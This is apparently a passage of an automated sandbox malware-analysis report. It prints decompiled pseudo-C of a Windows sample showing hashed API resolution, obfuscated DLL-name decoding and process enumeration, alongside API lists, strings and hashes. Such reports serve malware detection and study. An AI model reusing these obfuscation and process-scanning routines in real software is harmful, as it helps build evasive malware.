				_v664 = 0x77379a1d;
				_v660 = 0x215fc7c6;
				_v656 = 0x14dc1b4f;
				_v652 = 0xeeef69e8;
				_v648 = 0xc51a7849;
				_v644 = 0xc76cd979;
				_v640 = 0x6454f749;
				_v636 = 0x57b79021;
				_v632 = 0x6d9604a;
				_v696 = E00407563( &_v688);
				_v472 = 0xf80d21c5;
				_v468 = 0xf35502c4;
				_v464 = 0x12aaaa67;
				_v460 = 0x510ed401;
				_v456 = 0x55e9be7d;
				_v452 = 0x55e9be67;
				_v448 = 0xddee70f4;
				_v444 = 0x55706b42;
				_v440 = 0x62ad5364;
				_v436 = 0xb4d90ac2;
				_v432 = 0xcce13f8;
				_v428 = 0x901a571f;
				_v424 = 0x10e0;
				_v700 = E00407563( &_v472);
				_v524 = 0xea11b3e9;
				_v520 = 0x45095657;
				_v516 = 0xe53bdcfe;
				_v512 = 0xd05882c1;
				_v508 = 0x2a863dbc;
				_v504 = 0x2a863da6;
				_v500 = 0x7bd36ccc;
				_v496 = 0x69945c7d;
				_v492 = 0x179b5c31;
				_v488 = 0xdb606515;
				_v484 = 0xa5adb31b;
				_v480 = 0x7a3630b4;
				_v476 = 0xea0c;
				_v704 = E00407563( &_v524);
				_v576 = 0x5e04e976;
				_v572 = 0xed121a3e;
				_v568 = 0xef4ed6f;
				_v564 = 0x3f8eb7d5;
				_v560 = 0xe0e8432e;
				_v556 = 0xe0e84334;
				_v552 = 0x9237bb19;
				_v548 = 0xb21ba25d;
				_v544 = 0xd0af4928;
				_v540 = 0x8c6c97b6;
				_v536 = 0x4645232c;
				_v532 = 0xdb1de8f1;
				_v528 = 0x1533;
				_v708 = E00407563( &_v576);
				_v100 = 0xbf4b62fd;
				_v96 = 0x4749d76c;
				_v92 = 0xd6105db4;
				_v88 = 0x9d268062;
				_v84 = 0x75ad21d8;
				_v80 = 0x75ad21c8;
				_v76 = 0xded3991;
				_v72 = 0xf395cec2;
				_v68 = 0x982ab4e1;
				_v64 = 0x90d7b95a;
				_v692 = E00407563( &_v100);
				_v276 = 0xf4b68c3a;
				_v272 = 0xcbdcc55c;
				_v268 = 0xefe313b7;
				_v264 = 0x2d6700b0;
				_v260 = 0x5082eac4;
				_v256 = 0x5082ead2;
				_v252 = 0xce383451;
				_v248 = 0xab28094f;
				_v244 = 0x8ad8660e;
				_v240 = 0xa8c4a9fa;
				_v236 = 0x9090ede0;
				_v232 = 0x4e6c;
				_t267 = E00407563( &_v276);
				_v324 = 0xed55b36d;
				_v320 = 0x9872e8e4;
				_v316 = 0x244db1c7;
				_v312 = 0xf59e84b4;
				_v308 = 0x27e0e432;
				_v304 = 0x27e0e424;
				_v300 = 0x2eac3572;
				_v296 = 0x70207f35;
				_v292 = 0x71a38142;
				_v288 = 0x64f9c469;
				_v284 = 0xbc753444;
				_v280 = 0xa2d8;
				_t269 = E00407563( &_v324);
				_v628 = 0x2eafe3e3;
				_v624 = 0x400b0143;
				_v620 = 0x69b77306;
				_v616 = 0x2ee9cc28;
				_v612 = 0x7523ee90;
				_v608 = 0x7523ee8a;
				_v604 = 0xc708b128;
				_v600 = 0x5057753b;
				_v596 = 0xde4d3377;
				_v592 = 0x79ffebf3;
				_v588 = 0xf31de731;
				_v584 = 0x7e1624f7;
				_v580 = 0x128c;
				_t271 = E00407563( &_v628);
				_v140 = 0x9d96c4af;
				_v136 = 0x28684d57;
				_v132 = 0x15026896;
				_v128 = 0xfce56f06;
				_v124 = 0xf3697d7;
				_v120 = 0xf3697c7;
				_v116 = 0xebaf5aee;
				_v112 = 0x104677ac;
				_v108 = 0xeff451e8;
				_v104 = 0xde9fdfec;
				_t273 = E00407563( &_v140);
				_v764 = _v20;
				_v760 = _v16;
				_v756 = _v12;
				_v752 = _v8;
				_v420 = 0xf53e1e2e;
				_v416 = 0x78a053a9;
				_v412 = 0xab3dc06e;
				_v408 = 0xc8baa519;
				_v404 = 0x29fa0aee;
				_v400 = 0x29fa0af6;
				_v396 = 0x52f3358b;
				_v392 = 0xa82bebfe;
				_v388 = 0x37dd9268;
				_v384 = 0x863a17bd;
				_v380 = 0xbb1c7fee;
				_v376 = 0x9bbbc594;
				_v748 = _v696;
				_v744 = _v700;
				_v740 = _v704;
				_v716 = _t273;
				_v736 = _v708;
				_v732 = _v692;
				_v728 = _t267;
				_v724 = _t269;
				_v720 = _t271;
				_v712 = E00407563( &_v420);
				E004010BB(_t267, 1, 0x697a6afe);
				_t356 = _t355 + 0x40;
				_t308 = 0;
				_t277 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t348 = _t277;
				if(_t348 != 0) {
					 *_t348 = 0x22c;
					E004010BB(0, 1, 0x5bc1d14f);
					_t279 = CreateToolhelp32Snapshot(2, 0); // executed
					_t350 = _t279;
					_v692 = _t350;
					if(_t350 != 0xffffffff) {
						_v16 = 0;
						_v12 = 0;
						_v8 = 0;
						_v20 = 0;
						_t281 = E00409551(_t350, _t348); // executed
						if(_t281 == 0) {
							L22:
							E004010BB(_t308, 1, 0x3a35705f);
							VirtualFree(_t348, 0, 0x8000); // executed
							E0040162C(_t350);
							if(_t308 == 0) {
								E004010BB(_t308, 1, 0x3a35705f);
								VirtualFree( *_a4, 0, 0x8000); // executed
							}
							return _t308;
						}
						L5:
						while(_v20 == 0) {
							_t221 = _t348 + 0x24; // 0x24
							_t310 = _t221;
							_t352 = 0;
							while(E00401AC8( *((intOrPtr*)(_t354 + _t352 * 4 - 0x2f8)), _t310) != 0) {
								_t352 = _t352 + 1;
								if(_t352 < 0xe) {
									continue;
								}
								L15:
								_t350 = _v692;
								_t299 = E00409599(_v692, _t348); // executed
								if(_t299 == 0 || GetLastError() == 0x12) {
									goto L17;
								} else {
									goto L5;
								}
							}
							_push(_t310);
							_t311 = _a4;
							_v8 = 1;
							_push( *_t311);
							if(_v12 != 0) {
								E00401A92();
							} else {
								E00401AAD();
							}
							_t295 = E004010BB(_t311, 1, 0x2ca1b5f0);
							_t356 = _t356 + 0x10;
							 *_t295( *_t311, ",");
							_v12 = _v12 + 1;
							_t230 = _t348 + 0x24; // 0x24
							_t341 = _v16 + lstrlenW(_t230) * 2;
							_v16 = _t341;
							if(_t341 > 0x3c0) {
								_v20 = 1;
							}
							goto L15;
						}
						L17:
						_t308 = _v8;
						if(_t308 != 0) {
							_t309 = _a4;
							_t290 =  *_t309;
							if( *_t290 != 0) {
								 *((short*)( *_t309 + lstrlenW(_t290) * 2 - 2)) = 0;
							}
							_t308 = _v8;
						}
						 *_a8 = _v16;
						goto L22;
					}
					_t302 = E004010BB(0, 1, 0x3a35705f);
					 *_t302(_t348, 0, 0x8000);
				}
				return 0;
			}

0x00409a36
0x00409a4c
0x00409a51
0x00409a58
0x00409a5f
0x00409a66
0x00409a6c
0x00409a73
0x00409a7a
0x00409a81
0x00409a88
0x00409a8f
0x00409a96
0x00409aa2
0x00409aac
0x00409ab6
0x00409ac0
0x00409aca
0x00409ad4
0x00409ade
0x00409ae8
0x00409af2
0x00409afc
0x00409b06
0x00409b10
0x00409b1e
0x00409b28
0x00409b32
0x00409b3c
0x00409b46
0x00409b50
0x00409b5a
0x00409b64
0x00409b6e
0x00409b78
0x00409b82
0x00409b8c
0x00409b9b
0x00409ba5
0x00409baf
0x00409bb9
0x00409bc3
0x00409bcd
0x00409bd7
0x00409be1
0x00409beb
0x00409bf5
0x00409bff
0x00409c09
0x00409c13
0x00409c22
0x00409c25
0x00409c2f
0x00409c39
0x00409c43
0x00409c4d
0x00409c5d
0x00409c68
0x00409c72
0x00409c7c
0x00409c86
0x00409c90
0x00409c9a
0x00409ca4
0x00409cae
0x00409cb8
0x00409cc7
0x00409cd4
0x00409cde
0x00409ce8
0x00409cf2
0x00409cfc
0x00409d06
0x00409d10
0x00409d1a
0x00409d24
0x00409d2e
0x00409d38
0x00409d42
0x00409d4c
0x00409d5a
0x00409d67
0x00409d71
0x00409d7b
0x00409d85
0x00409d8f
0x00409d99
0x00409da3
0x00409dad
0x00409db7
0x00409dc1
0x00409dcb
0x00409dd5
0x00409ddf
0x00409ded
0x00409dfa
0x00409e04
0x00409e0e
0x00409e18
0x00409e22
0x00409e2c
0x00409e36
0x00409e40
0x00409e4a
0x00409e54
0x00409e5e
0x00409e68
0x00409e72
0x00409e80
0x00409e8a
0x00409e91
0x00409e98
0x00409e9f
0x00409ea6
0x00409ead
0x00409eb4
0x00409ebb
0x00409ec2
0x00409ec9
0x00409ed5
0x00409edb
0x00409ee5
0x00409ef5
0x00409f00
0x00409f0a
0x00409f14
0x00409f1e
0x00409f28
0x00409f32
0x00409f3c
0x00409f46
0x00409f50
0x00409f59
0x00409f60
0x00409f70
0x00409f7b
0x00409f85
0x00409f8f
0x00409f99
0x00409fa3
0x00409fad
0x00409fb7
0x00409fc1
0x00409fcb
0x00409fd5
0x00409fde
0x00409fe5
0x00409ff5
0x0040a000
0x0040a00a
0x0040a014
0x0040a01e
0x0040a028
0x0040a032
0x0040a03c
0x0040a046
0x0040a050
0x0040a05a
0x0040a064
0x0040a06d
0x0040a074
0x0040a084
0x0040a08f
0x0040a096
0x0040a09d
0x0040a0a4
0x0040a0ab
0x0040a0b2
0x0040a0b9
0x0040a0c0
0x0040a0c7
0x0040a0cf
0x0040a0d8
0x0040a0e1
0x0040a0ea
0x0040a0f6
0x0040a100
0x0040a10a
0x0040a114
0x0040a11e
0x0040a128
0x0040a132
0x0040a13c
0x0040a146
0x0040a150
0x0040a15a
0x0040a164
0x0040a16e
0x0040a17a
0x0040a186
0x0040a192
0x0040a19e
0x0040a1ab
0x0040a1b1
0x0040a1b7
0x0040a1bd
0x0040a1cf
0x0040a1d5
0x0040a1da
0x0040a1dd
0x0040a1e9
0x0040a1eb
0x0040a1ef
0x0040a1ff
0x0040a205
0x0040a20f
0x0040a211
0x0040a213
0x0040a21c
0x0040a239
0x0040a23e
0x0040a241
0x0040a244
0x0040a247
0x0040a250
0x0040a32f
0x0040a336
0x0040a346
0x0040a349
0x0040a351
0x0040a35f
0x0040a36f
0x0040a36f
0x00000000
0x0040a371
0x00000000
0x0040a256
0x0040a262
0x0040a262
0x0040a265
0x0040a267
0x0040a27a
0x0040a27e
0x00000000
0x00000000
0x0040a2df
0x0040a2df
0x0040a2e7
0x0040a2f0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a2f0
0x0040a286
0x0040a287
0x0040a28a
0x0040a291
0x0040a293
0x0040a29c
0x0040a295
0x0040a295
0x0040a295
0x0040a2aa
0x0040a2af
0x0040a2b8
0x0040a2ba
0x0040a2bd
0x0040a2ca
0x0040a2cd
0x0040a2d6
0x0040a2d8
0x0040a2d8
0x00000000
0x0040a2d6
0x0040a301
0x0040a301
0x0040a306
0x0040a308
0x0040a30d
0x0040a312
0x0040a31f
0x0040a31f
0x0040a324
0x0040a324
0x0040a32d
0x00000000
0x0040a32d
0x0040a225
0x0040a233
0x0040a233
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,771F423D,00003000,?), ref: 00409A4C
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0040A1E9
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A20F

Part of subcall function 00409551: Process32First.KERNEL32(00000000,0040A24C,?,0040A24C,00000000,00000000), ref: 00409568

lstrlenW.KERNEL32(00000024), ref: 0040A2C1

Part of subcall function 00409599: Process32Next.KERNEL32(?,0040A2EC,?,0040A2EC,?,00000000), ref: 004095B0

GetLastError.KERNEL32 ref: 0040A2F2
lstrlenW.KERNEL32(00000000), ref: 0040A315
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040A346
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040A36F

Strings

.C, xrefs: 00409E22
lN, xrefs: 00409F50
4C, xrefs: 00409E2C
,#EF, xrefs: 00409E5E
BkpU, xrefs: 00409D1A
WVE, xrefs: 00409D71
;uWP, xrefs: 0040A032
2', xrefs: 00409F8F
\t, xrefs: 00409B10
$', xrefs: 00409F99
WMh(, xrefs: 0040A084
i, xrefs: 00409C86
\.b2, xrefs: 00409B8C

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$AllocFreeProcess32lstrlen$CreateErrorFirstLastLibraryLoadNextSnapshotToolhelp32
String ID: $'$,#EF$.C$2'$4C$;uWP$BkpU$WMh($WVE$\.b2$\t$lN$i
API String ID: 3678052756-637760403
Opcode ID: ba3433bfaaa398aafb99d643b9098482cb928eb718d402902574e251dbfd2756
Instruction ID: 6789a91e7dd9060ba93c97120555a1399a99cc8edee7e7be998bad37b1434475
Opcode Fuzzy Hash: ba3433bfaaa398aafb99d643b9098482cb928eb718d402902574e251dbfd2756
Instruction Fuzzy Hash: 8A220CB0C05369ABDB60DF958889BDDBBB4FB09300F1082EAD548BB351DB745A81CF56

Uniqueness

Uniqueness Score: 100.00%

Function 004129F0, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 225
windowUNIQUE

Download Yara Rule

C-Code - Quality: 83%

			E004129F0(void* __ebx, void* __edx, void* __edi) {
				intOrPtr _v16;
				char _v276;
				char _v296;
				intOrPtr _v312;
				char* _v316;
				int _v328;
				void* _v336;
				void* _v356;
				long _v360;
				int _v364;
				char* _v368;
				struct HWND__* _v372;
				intOrPtr _v376;
				void* _v380;
				char _v384;
				struct HWND__* _v392;
				intOrPtr _v396;
				int _v400;
				signed int _v408;
				void* __esi;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t55;
				char _t58;
				char* _t60;
				signed int _t61;
				struct HWND__* _t62;
				signed int _t64;
				intOrPtr _t68;
				signed int _t73;
				signed int _t78;
				intOrPtr _t81;
				intOrPtr _t86;
				signed int _t108;
				signed int _t112;
				signed int _t113;
				signed int _t117;
				void* _t119;
				struct HWND__* _t120;
				int _t122;
				struct HWND__* _t124;
				signed int _t125;
				signed int _t128;
				intOrPtr _t131;
				signed int _t138;
				void* _t142;
				intOrPtr _t143;
				signed int _t149;
				void* _t150;
				char _t151;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr _t157;
				int _t158;
				int _t160;
				char* _t161;
				struct HWND__* _t164;
				int* _t166;
				int* _t167;
				void* _t173;
				void* _t182;

				_t150 = __edi;
				_t142 = __edx;
				_t119 = __ebx;
				_t166 =  &_v364;
				if( *0x44d364 != 0) {
					_t117 =  *0x44b630; // 0xd65634aa
					 *0x44cb5c = _t117 -  *0x44cb5c;
				}
				_v360 = 0;
				_push( &_v364);
				_t50 =  &_v360;
				_v364 = 0;
				_push(_t50);
				_push(0);
				_push(0);
				_push(0); // executed
				L00416454(); // executed
				_t156 = _t50;
				if(_t156 == 0) {
					_t157 =  *0x44ca40; // 0x770
					_t156 = _t157 + 0x25b;
					__eflags = _t156;
				} else {
					 *0x44cdb4 = 0;
				}
				if(_v16 == 0) {
					_t172 =  *0x44d368;
					if( *0x44d368 == 0) {
						_push(0xa47);
						E0041FCE9(_t119, _t142, _t150, _t156, _t172, _t182, L"_hinst != NULL", L"build.cpp");
						_t166 =  &(_t166[3]);
					}
				}
				 *0x44d1ec =  *0x44d1ec + 1;
				_t51 =  *0x44cb5c; // 0x2
				_t124 =  *0x44ca4c; // 0x0
				_t173 =  *0x44cdb4 - _t51; // 0x0
				if(_t173 <= 0) {
					_t52 = _t51 + 0x13a;
					__eflags = _t52;
					 *0x44cb5c = _t52;
				} else {
					_t113 =  *0x44b630; // 0xd65634aa
					 *0x44cdb4 = 0;
					 *0x44b630 = _t113 + 0x1d4 + _t124;
				}
				_push(_t119);
				 *0x44d364 =  *0x44d364 + 0xfffffffe - _t124;
				_t55 =  *0x44ca44; // 0x76d
				_push(_t150);
				_push(0x2400);
				_push(0x1f40);
				 *0x44ca44 = _t55 + 0x512 + _t156; // executed
				_t58 = E0041A956();
				_t164 =  *0x44ca4c; // 0x0
				_t167 =  &(_t166[2]);
				_t151 = _t58;
				_v384 = _t151;
				 *0x44ca40 = GetLastError();
				_t60 = PathFindFileNameA(0x44cb60);
				_t158 =  *0x44b630; // 0xd65634aa
				_v368 = _t60;
				_t61 =  *0x44cb5c; // 0x2
				_v380 = _t61;
				_t62 = GetDlgItem( *0x44ca4c, _t158);
				_t143 =  *0x44ca40; // 0x770
				_t120 = _t62;
				_t125 =  *0x44b630; // 0xd65634aa
				_v316 =  &_v276;
				_t64 =  *0x44d1ec; // 0x9119dde3
				_v372 = _t120;
				_v336 = 1;
				_v312 = 0x100;
				_v328 = 1;
				 *0x44b630 = _t125 + _t143 + 0x32 + (_t143 + 0x32) * 2;
				_t128 =  *0x44cdb4; // 0x0
				_t131 = _t128 -  *0x44ca4c + 0x22 + _t151;
				_v376 = _t131;
				if(_t64 + _t131 != 0) {
					 *0x44cb5c =  *0x44cb5c + 1;
				}
				SendMessageA(_t120, 0x102d, _t158,  &_v336);
				_t68 =  *0x44d364; // 0x76e
				 *0x44cb5c = (_v16 -  *0x44b630 - 1) * (_t68 +  *0x44b630);
				StrToIntExA( &_v276, 1,  &_v364);
				_t73 =  *0x44cdb4; // 0x0
				 *0x44d364 = (_t73 + 1) *  *0x44b630 * 0x96 +  *0x44d1ec;
				_t78 =  *0x44cb5c; // 0x2
				 *0x44b630 = _t78 + _t78 * 2 + _t78 + _t78 * 2;
				_t81 =  *0x44ca44; // 0x76d
				 *0x44ca40 =  *0x44ca40 + _t81;
				 *0x44cdc4 = CreatePen(0, 1, GetSysColor(0x16));
				SendMessageA(_v392, 0x102d, _v400,  &_v356);
				_t86 =  *0x44c834; // 0x2
				_v396 = _v396 + _t164 + (_t86 + 0x32 + _t151) * 2 + _t86 + 0x32 + _t151;
				StrToIntExA( &_v296, 1,  &_v380);
				_t160 = 0;
				do {
					_t34 = _t160 + 1; // 0x1
					_t122 = _t34;
					wnsprintfA( &_v384, 0x14, "%Xh (%u, LPT%u)",  *(0x437cb0 + _t160 * 2) & 0x0000ffff,  *(0x437cb0 + _t160 * 2) & 0x0000ffff, _t122);
					_t152 =  *0x44c830; // 0x0
					_t167 =  &(_t167[6]);
					_t149 =  *0x44cdb4; // 0x0
					_t153 = _t152 *  *0x44d1ec;
					_t37 = _t149 + 2; // 0x2
					 *0x44d364 = _t37 + _t37 * 2 + _t152 * _v408 +  *0x44b630;
					 *0x44d378 = _v408;
					 *0x44d370 = _t160 * _t149 +  *0x44ca40;
					SendMessageA(_t164, 0x143, 0,  &_v380);
					if(_v408 ==  *(0x437cb0 + _t160 * 2)) {
						_t138 =  *0x44d1ec; // 0x9119dde3
						_t108 =  *0x44cdb4; // 0x0
						 *0x44d364 = 1 + _t108 * 2 + (_t138 -  *0x44cb5c) * _t153 + _v400;
						SendMessageA(_t164, 0x14e, _t160, 0);
						_t112 =  *0x44c830; // 0x0
						 *0x44d1ec = _t112;
					}
					_t160 = _t122;
				} while (_t160 < 3);
				_t161 = _v392;
				if(StrChrA(_t161, 0x20) == 0) {
					PathFindExtensionA(_t161);
				}
				return 0;
			}

0x004129f0
0x004129f0
0x004129f0
0x004129f0
0x004129fd
0x004129ff
0x00412a0a
0x00412a0a
0x00412a14
0x00412a1c
0x00412a1d
0x00412a21
0x00412a29
0x00412a2a
0x00412a2c
0x00412a2e
0x00412a30
0x00412a35
0x00412a39
0x00412a47
0x00412a4d
0x00412a4d
0x00412a3b
0x00412a3b
0x00412a3b
0x00412a5b
0x00412a5d
0x00412a64
0x00412a66
0x00412a75
0x00412a7a
0x00412a7a
0x00412a64
0x00412a7d
0x00412a83
0x00412a88
0x00412a8e
0x00412a94
0x00412ab3
0x00412ab3
0x00412ab8
0x00412a96
0x00412a96
0x00412aa0
0x00412aac
0x00412aac
0x00412abd
0x00412ac5
0x00412acb
0x00412ad1
0x00412ad9
0x00412ade
0x00412ae3
0x00412ae8
0x00412aed
0x00412af3
0x00412af6
0x00412af8
0x00412b07
0x00412b0c
0x00412b12
0x00412b1f
0x00412b23
0x00412b28
0x00412b2c
0x00412b32
0x00412b38
0x00412b3a
0x00412b47
0x00412b4b
0x00412b52
0x00412b56
0x00412b5e
0x00412b69
0x00412b71
0x00412b77
0x00412b86
0x00412b88
0x00412b8e
0x00412b90
0x00412b90
0x00412ba8
0x00412bb7
0x00412bdb
0x00412be1
0x00412be3
0x00412bfe
0x00412c03
0x00412c0d
0x00412c12
0x00412c17
0x00412c2e
0x00412c45
0x00412c47
0x00412c60
0x00412c6f
0x00412c71
0x00412c73
0x00412c7b
0x00412c7b
0x00412c8d
0x00412c93
0x00412c99
0x00412c9c
0x00412ca9
0x00412cb0
0x00412cbe
0x00412cc7
0x00412cd7
0x00412ce9
0x00412cfc
0x00412cfe
0x00412d0a
0x00412d28
0x00412d2d
0x00412d33
0x00412d38
0x00412d38
0x00412d3d
0x00412d3f
0x00412d48
0x00412d5a
0x00412d5d
0x00412d5d
0x00412d6c

APIs

RasEnumEntriesW.RASAPI32(00000000,00000000,00000000,?,001E0000), ref: 00412A30
GetLastError.KERNEL32 ref: 00412AFC
PathFindFileNameA.SHLWAPI(0044CB60), ref: 00412B0C
GetDlgItem.USER32(D65634AA), ref: 00412B2C
SendMessageA.USER32(00000000,0000102D,D65634AA,00000001), ref: 00412BA8
StrToIntExA.SHLWAPI(?,00000001,?), ref: 00412BE1
GetSysColor.USER32(00000016), ref: 00412C1D
CreatePen.GDI32(00000000,00000001,00000000), ref: 00412C28
SendMessageA.USER32(?,0000102D,?,00000001), ref: 00412C45
StrToIntExA.SHLWAPI(?,00000001,?), ref: 00412C6F
wnsprintfA.SHLWAPI ref: 00412C8D
SendMessageA.USER32(00000000,00000143,00000000,?), ref: 00412CE9
SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00412D2D
StrChrA.SHLWAPI(?,00000020), ref: 00412D4F
PathFindExtensionA.SHLWAPI(?), ref: 00412D5D

Strings

build.cpp, xrefs: 00412A6B
%Xh (%u, LPT%u), xrefs: 00412C81
_hinst != NULL, xrefs: 00412A70

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: MessageSend$FindPath$ColorCreateEntriesEnumErrorExtensionFileItemLastNamewnsprintf
String ID: %Xh (%u, LPT%u)$_hinst != NULL$build.cpp
API String ID: 4248789766-3980967368
Opcode ID: a7724a2be67891a09b5f33d36b2b782299a300f6b0b24cb24a95be6edea3242e
Instruction ID: 57643a577765c3e9a1bd1b2503ea9b5084605651137c4638d378d75b8e29340b
Opcode Fuzzy Hash: a7724a2be67891a09b5f33d36b2b782299a300f6b0b24cb24a95be6edea3242e
Instruction Fuzzy Hash: 33A17FBA9053049FD360CF28ED85BAA7BE4FB4A304F08503AE945D73A0D774A945CB8D

Uniqueness

Uniqueness Score: 100.00%

Function 004010BB, Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 288
UNIQUE

Download Yara Rule

C-Code - Quality: 85%

			E004010BB(void* __ebx, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v31;
				intOrPtr _v35;
				char _v36;
				char _v40;
				char _v43;
				intOrPtr _v47;
				char _v48;
				char _v52;
				char _v54;
				intOrPtr _v58;
				char _v59;
				char _v60;
				char _v64;
				char _v66;
				short _v68;
				intOrPtr _v72;
				char _v76;
				char _v77;
				intOrPtr _v81;
				char _v82;
				short _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				intOrPtr _v108;
				char _v109;
				char _v110;
				short _v112;
				char _v116;
				signed int _t97;
				void* _t110;
				char _t114;

				_t110 = __ebx;
				_v28 = 0x534b5b55;
				_v8 = 0;
				_v54 = 0;
				_v77 = 0;
				_v104 = 0;
				_v31 = 0;
				_v66 = 0;
				_v43 = 0;
				_t114 = 0x19;
				_t97 = _a4 - 1;
				_v24 = 0x534b1553;
				_v20 = 0x53;
				_v64 = 0x594c5a5c;
				_v60 = 0x1a;
				_v59 = _t114;
				_v58 = 0x53534b15;
				_v88 = 0x534c4f5a;
				_v84 = 0x1a53;
				_v82 = _t114;
				_v81 = 0x53534b15;
				_v116 = 0x485d4b48;
				_v112 = 0x5057;
				_v110 = 0x1a;
				_v109 = _t114;
				_v108 = 0x53534b15;
				_v100 = 0x5055505e;
				_v96 = 0x155b4c55;
				_v92 = 0x53534b;
				_v40 = 0x1a504b4e;
				_v36 = _t114;
				_v35 = 0x53534b15;
				_v76 = 0x594a5759;
				_v72 = 0x4b151b5b;
				_v68 = 0x5353;
				_v16 = 0x15595754;
				_v12 = 0x53534b;
				_v52 = 0x1a4c5356;
				_v48 = _t114;
				_v47 = 0x53534b15;
				if(_t97 > 0xa) {
					L52:
					return 0;
				}
				switch( *((intOrPtr*)(_t97 * 4 +  &M0040140F))) {
					case 0:
						_t122 = E0040108B(_t114);
						goto L47;
					case 1:
						__eax =  &_v28;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v28;
						_push( &_v28);
						__eax = __eax->i();
						__eax =  &_v28;
						if(_v28 == 0) {
							goto L47;
						} else {
							goto L6;
						}
						do {
							L6:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 2:
						__eax =  &_v64;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v64;
						_push( &_v64);
						__eax = __eax->i();
						__eax =  &_v64;
						if(_v64 == 0) {
							goto L47;
						} else {
							goto L11;
						}
						do {
							L11:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 3:
						__eax =  &_v88;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v88;
						_push( &_v88);
						__eax = __eax->i();
						__eax =  &_v88;
						if(_v88 == 0) {
							goto L47;
						} else {
							goto L16;
						}
						do {
							L16:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 4:
						__eax =  &_v116;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v116;
						_push( &_v116);
						__eax = __eax->i();
						__eax =  &_v116;
						if(_v116 == 0) {
							goto L47;
						} else {
							goto L21;
						}
						do {
							L21:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 5:
						__eax =  &_v100;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v100;
						_push( &_v100);
						__eax = __eax->i();
						__eax =  &_v100;
						if(_v100 == 0) {
							goto L47;
						} else {
							goto L26;
						}
						do {
							L26:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 6:
						goto L52;
					case 7:
						__eax =  &_v40;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v40;
						_push( &_v40);
						__eax = __eax->i();
						__eax =  &_v40;
						if(_v40 == 0) {
							goto L47;
						} else {
							goto L31;
						}
						do {
							L31:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 8:
						__eax =  &_v76;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v76;
						_push( &_v76);
						__eax = __eax->i();
						__eax =  &_v76;
						if(_v76 == 0) {
							goto L47;
						} else {
							goto L36;
						}
						do {
							L36:
							__eax->i = __eax->i + 0xe7;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						goto L47;
					case 9:
						__eax =  &_v16;
						do {
							__eax->i = __eax->i + __cl;
							__eax =  &(__eax->i);
						} while (__eax->i != 0);
						__eax = E004010BB(__ebx, 1, 0xc8ac8026);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  &_v16;
						__eax = LoadLibraryA( &_v16); // executed
						__eax =  &_v16;
